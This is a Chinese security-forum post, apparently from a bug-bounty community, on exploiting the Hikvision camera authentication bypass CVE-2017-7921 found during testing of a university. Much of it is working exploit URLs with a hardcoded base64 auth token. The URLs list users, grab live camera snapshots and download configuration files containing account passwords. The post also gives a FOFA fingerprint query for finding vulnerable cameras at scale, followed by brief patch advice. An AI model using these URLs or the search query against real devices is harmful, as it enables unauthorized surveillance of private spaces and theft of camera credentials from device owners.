教育SRC实战渗透摄像头

spider   ·   发表于 2021-06-02 11:15:42   ·   实战纪实
前言:此次所遇到的漏洞是在对济南大学渗透时发现的一个海康威视为授权访问与敏感信息获取漏洞。

漏洞概述说明

漏洞编号:CVE-2017-7921

  1. 在海康威视DS-2CD2xx2F-I Series V5.2.0 build 140721V5.4.0 build 160530DS-2CD2xx0F-I Series V5.2.0 build 140721V5.4.0 build 160401DS-2CD2xx2FWD Series V5.3.1 build 150410V5.4.4 build 161125DS-2CD4x2xFWD Series V5.2.0 build 140721V5.4.0 build 160414中发现不正确的身份验证问题
  2. DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 build 160421DS-2DFx Series V5.2.0 build 140805 to V5.4.5 build 160928DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 build 160106设备。
  3. 当应用程序没有充分或正确地对用户进行身份验证时,就会出现不正确的身份验证漏洞。这可能允许恶意用户升级其在系统上的权限并获得对敏感信息的访问权限

漏洞危害

成功利用这些漏洞可能会导致恶意攻击者提升其权限或假设已验证用户的身份并获取敏感数据。通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。

实战部分

  1. CVE-2017-7921exp
  2. http://camera.ip/Security/users?auth=YWRtaW46MTEK
  3. YWRtaW46MTEKadmin:11base64编码
这个文件里可以检索所有用户及其角色的列表信息。这里的意思应该是说有两个用户,分别为admin和admin2

进一步构造url可绕过登录,直接查看监控的实时快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

3、利用路径:下载摄像头配置账号密码文件。下载威视管理工具即可查看账号密码
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

以上便是实战部分。想实战的小伙伴我分享了指纹

  1. fofa搜索:app="HIKVISION-视频监控"

如果小伙伴家里有用到此类产品检测存在漏洞,尽快修补喔!

修复建议:
海康威视已发布更新,以减轻通过授权分销商销售的摄像头中的不正确身份验证漏洞。这些更新可从以下位置下载:http://www.hikvision.com/us/about_.html

用户名金币积分时间理由
奖励系统 100.00 0 2021-06-08 08:08:50 投稿满 10 赞奖励
可儿 4.00 0 2021-06-07 07:07:57 一个受益终生的帖子~~
奖励系统 50.00 0 2021-06-07 07:07:07 投稿满 5 赞奖励
乐伟超 5.00 0 2021-06-05 16:04:59 一个受益终生的帖子~~
Track-聂风 40.00 0 2021-06-05 15:03:08 一个受益终生的帖子~~

打赏我,让我更有动力~

3 Reply   |  Until 4天前 | 474 View

spider
发表于 10天前

点赞充电,持续更新

评论列表

  • 加载数据中...

编写评论内容

spider
发表于 4天前

评论列表

  • 加载数据中...

编写评论内容

a1287074202
发表于 4天前

牛皮牛皮

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2021. All Rights Reserved. 掌控者

Powered by 掌控者